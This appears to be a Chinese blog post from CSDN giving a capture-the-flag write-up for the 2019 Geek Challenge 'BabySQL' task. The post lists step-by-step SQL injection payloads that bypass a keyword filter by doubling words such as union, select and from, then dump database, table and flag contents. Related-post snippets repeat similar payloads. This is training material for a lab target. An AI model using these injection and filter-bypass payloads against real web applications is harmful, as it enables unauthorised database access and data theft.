极客大挑战2019——baby sql

最新推荐文章于 2023-11-11 20:47:26 发布
最新推荐文章于 2023-11-11 20:47:26 发布
阅读量665 收藏 1
点赞数 2
分类专栏: 极客大挑战 文章标签: web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44308327/article/details/121481968
版权

baby sql(注意双写绕过)

判断注入类型

既然是sql注入题,那就先判断注入的数据类型

payload: ?username=admin&password=1
payload: ?username=admin&password=2-1
//判断页面是否发生变化,如有变化则为字符型注入,反之则为整型注入

 

 无变化,所以为整型注入

判断回显位 

payload:?username=admin&password=1' order by 3%23

 说明“or”被过滤了,无法显示,所以咱们可以双写绕过

      双写or后还是报错,还是无法判断此条语句,此时我怀疑by也可能被过滤了,于是我尝试双写by注入

 很好没有报错了,经过证明,by确实也被过滤了

 把3改成4的又报错了,所以判断回显位是3


爆库

payload: ?username=admin&password=1' aunion bselect database() %23

判断union和select有没有被过滤

union和select都被过滤了 ,改造语句再查所有的库

payload:?username=admin&password=1' ununionion seselectlect 1,2,(seselectlect group_concat(schema_name) from information_schema.schemata)%23

发现from和information也被过滤了 

再次重构语句

payload:?username=admin&password=1' ununionion seselectlect 1,(seselectlect group_concat(schema_name) frfromom infoorrmation_schema.schemata),3 %23

 终于拿到库    information_schema,mysql,performance_schema,test,ctf,geek

在库名中发现有一个ctf库,哈哈😀,这不就找出来了嘛!

爆表

payload:?username=admin&password=1' ununionion seselectlect 1,2,(seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema = 'ctf')%23



拿到表名:Flag

 

爆字段

payload:?username=admin&password=1' ununionion seselectlect 1,2,(seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema = 'ctf' anandd table_name='Flag')%23

 得到字段:Flag


拿数据

payload:?username=admin&password=1' ununionion seselectlect 1,2,(seselectlect Flag frfromom ctf.Flag)%23


拿到flag;flag{fff92db2-240c-4c65-83c3-f25bec6a0398}

 

总结:

   主要就是找出被过滤的字符,在被过滤的情况下如何构造语句进行绕过,后面爆库啥拿数据啥的就挺简单了。

S0Monk
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
buuctf-[极客挑战 2019]BabySQL(小宇特详解)
小宇的web博客
01-19 5087
buuctf-[极客挑战 2019]BabySQL(小宇特详解) 这里看题的话是一道SQL注入。 这里先尝试一下万能密码 这里发现它过滤了or(直接删除了or) 这里尝试进行双写 也就是oorr,这里删除了or后又重新构造了一个or 这里发现还是不行 这里先看一下双写union select 1 /check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23 这里发现不是报错,而是列数不对 当列数为3的时候对
BUUCTF[极客挑战 2019]BabySQL
rumil的博客
06-25 1907
通过输入非0数字,能正常回显,0和字母不能正常回显,什么都没有显示。刚刚我们输入非0数字正常回显,0和字母不能正常的回显,猜测说明sql语句当中可能存在||运算符,只有输入非0数字,才会返回true,回显条件。可观察网页的源码信息,发现有check.php,猜测可能是登录界面时,输入账号和密码的跳转界面,提示信息。通过上面的过程我们不难发现,此时还存在过滤,from和where也被过滤,同理双写绕过。拿到该靶机,观察界面,存在登录说明存在可能SQL注入,根据题目也可得知存在SQL注入。
[极客挑战 2019]BabySQL
wuuconix's blog
03-10 971
[极客挑战 2019]BabySQL 考点: SQL关键字过滤 双拼绕过 这道题延续之前的LoveSQL 的解体方法,思路一模一样,但是这道题过滤了许多关键字。比如union or order by from select 等等 下面是我做题时总结出来的如何判断某关键字被过滤的办法,比如我们现在判断or 有没有被过滤 check.php?username=-1' ors ;%23&password=1234 我在or后加了个s ,不管有没有被过滤,都会报错,我们看看它的报错 Yo
极客挑战2019Baby SQL解题
Bird&Bird
10-25 1990
1、打开BUUCTF在线评测,选择web--->【极客挑战2019Baby SQL。 2、首先采用万能密码试一下,出错了。 3、那使用普通注入试一下,报错了,从这里可以看出过滤了 union select 。 4、接着使用双写方式绕过过滤,试一下。 username=admin&password=123456' ununionion selselectect 1 %23 从结果上看,虽然也报错了,但提示不是sql语法错误,而且我们提供的查询字段数不对。 ..
极客学院简单demo——天气预报
07-17
一个简单的天气项目
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
第三届 Apache Flink 极客挑战赛暨AAIG CUP——电商推荐“抱大腿”攻击识别亚军代码方案.zip
最新发布
06-23
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请...
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
[极客挑战 2019]BabySQL1 思路细致讲解
hac1ker123的博客
05-19 697
[极客挑战 2019]BabySQL1 思路细致讲解
BUUCTF Web [极客挑战 2019]BabySQL
网安小趴菜
08-31 422
BUUCTF Web [极客挑战 2019]BabySQL
BUUCTF [web专项15][极客挑战 2019]BabySQL
yanglinchiji的博客
11-03 129
试一遍之后会发现or可能被过滤掉了,因为只有当or的形式变成非连接符的时候才可以通过。其实这题找出来万能钥匙成功登录后就没有想法了,看了一下别人的思路再做就ok了。进入后获得账号密码,用此账号密码进行登录,并在进行的同时进行注入操作。爆库,发现show databases不行,用麻烦点的。发现下面有个flag字段,选择爆数据。测试列数(密码需要自行修改)发现共有三列,开始测回显点。感觉在ctf中,再爆一下表。进入后发现是个登陆界面。查看表Flag下的字段。
[极客挑战 2019]BabySQL1
m0_73721944的博客
11-11 190
检查与您的MariaDB服务器版本对应的手册,以便在第1行'1=1#'和password='123 "附近使用正确的语法。1'ununionion seselectlect 1,2,3#&passward=1 有回显,说明有三列。1’ order by 3#&passward=123 报错发现order中的or与by都被过滤了。1'ununionion seselectlect 1,2,3,4#&passward=1 报错。打开是这样的,是之前两个题的升级版。有回显说明双写绕过是可行的。
BUUCTF:[极客挑战 2019]BabySQL
末初的CSDN博客
11-04 685
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]BabySQL 简单测试之后发现有些字符被过滤,初步判断这里的过滤是指特殊字符被替换为空,如下图所示 使用Burp进行SQL过滤字符的Fuzz 这些长度为726响应内容是Input your username and password的Fuzz结果是被过滤的字符 Trick 替换为空的关键字过滤使用双写关键字绕过 这里空格.
CTF学习笔记——[极客挑战 2019]BabySQL
Obs_cure的博客
02-09 1388
一、[极客挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单记述一下心路历程。SQL注入的题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双写。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双写绕过学会了) 接下来就是常
【BUUCTF】 [极客挑战2019] BabySQL —— 清晰易懂总结好的 Writeup
algae
08-25 835
【BUUCTF】 [极客挑战2019] BabySQL Writeup0x00 考点sql 注入 双写绕过0x01 解题爆库爆表爆列 0x00 考点 sql 注入 双写绕过 replace函数,找到union和select等替换为空 双写绕过,单词中间拆开,分两半,里面藏一个完整的: union ununionion select seselectlect from frfromom where whwhereere (过滤了or) information infoorrmation 常见UR
BUUCTF [极客挑战 2019]BabySQL
qq_52999628的博客
08-16 908
今天来做一道sql注入题,做这类题之前一直没有什么头绪,经常是各种常用的语句胡乱注入一通,所以这次想来完整记录一下整体思路,以供以后参考。 首先输入1'
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

S0Monk

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值